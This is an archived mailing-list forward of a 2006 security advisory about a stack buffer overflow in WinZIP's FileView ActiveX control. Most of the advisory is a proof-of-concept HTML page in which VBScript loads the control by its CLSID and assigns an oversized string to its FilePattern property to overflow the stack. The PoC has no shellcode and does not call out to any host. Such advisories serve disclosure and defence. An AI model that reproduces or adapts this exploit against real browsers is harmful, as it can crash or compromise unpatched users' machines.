Security-Alerts mailing list archive (security-alerts@yandex-team.ru)
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[security-alerts] FW: [EXPL] WinZIP Stack Overflow POC (FileView ActiveX Control)
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Sunday, November 19, 2006 7:06 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [EXPL] WinZIP Stack Overflow POC (FileView ActiveX Control)
>
> The following security advisory is sent to the securiteam
> mailing list, and can be found at the SecuriTeam web site:
>
>
> - - promotion
>
> The SecuriTeam alerts list - Free, Accurate, Independent.
>
> Get your security news from a reliable source.
>
>
>
> - - - - - - - - -
>
>
>
> WinZIP Stack Overflow POC (FileView ActiveX Control)
>
>
>
> "WinZip <> is a windows data
> compression utility that focuses on the Zip data compression
> format for windows users."
>
> A stack overflow vulnerability exists in WinZIP's FileView
> ActiveX control.
>
>
> Vulnerable Systems:
> * WinZIP versions 10.0.7245 and prior.
>
> Exploit:
> <!--
> WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability
> -- prdelka
> -->
>
> <HTML>
> <HEAD>
> <TITLE></TITLE>
> </HEAD>
> <BODY>
> <SCRIPT LANGUAGE="VBScript">
> <!--
> Sub WZFILEVIEW_OnAfterItemAdd(Item)
> WZFILEVIEW.FilePattern =
>
> "STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB
> ASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOV
> ERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW
> STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKB
> ASEDOVERFLOWSTACKBASEDOVERFLOW"
> end sub
> -->
> </SCRIPT>
> <OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200
> CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904">
> </OBJECT>
> </BODY>
> </HTML>
>
>
> Additional Information:
> The information has been provided by milw0rm
> <> .
> The original article can be found at:
>
>
>
|
